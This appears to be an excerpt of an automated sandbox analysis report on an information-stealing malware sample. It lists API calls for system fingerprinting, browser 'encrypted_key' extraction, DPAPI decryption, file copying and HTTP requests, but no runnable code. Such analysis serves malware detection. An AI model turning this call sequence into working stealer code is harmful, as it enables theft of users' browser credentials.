                                                                                                                                                                                                                      • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                      • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                                                      • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                      • String ID: %d MB
                                                                                                                                                                                                                      • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C89C947
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C89C969
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C89C9A9
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C89C9C8
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C89C9E2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4191843772-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1274457161-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                      • API String ID: 2929475105-1843082770
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                      • API String ID: 591506033-2861137601
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                      • String ID: =A
                                                                                                                                                                                                                      • API String ID: 3183270410-2399317284
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 211194620-0
                                                                                                                                                                                                                      • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                                                                      • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                      • API String ID: 161838763-3310892237
                                                                                                                                                                                                                      • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                                                                      • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                                                                                                                        • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                                                                                                                        • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                                                                                                                        • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                                                                                                                        • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                        • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                                                                                        • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                                                                        • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                      • String ID: nzA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                                                                        • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                                                                        • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                                                                        • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                      • String ID: ERROR$ERROR
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065093856-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C883095
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C90F688,00001000), ref: 6C8835D5
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C8835E0
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C8835FD
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C88363F
                                                                                                                                                                                                                        • Part of subcall function 6C8835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C88369F
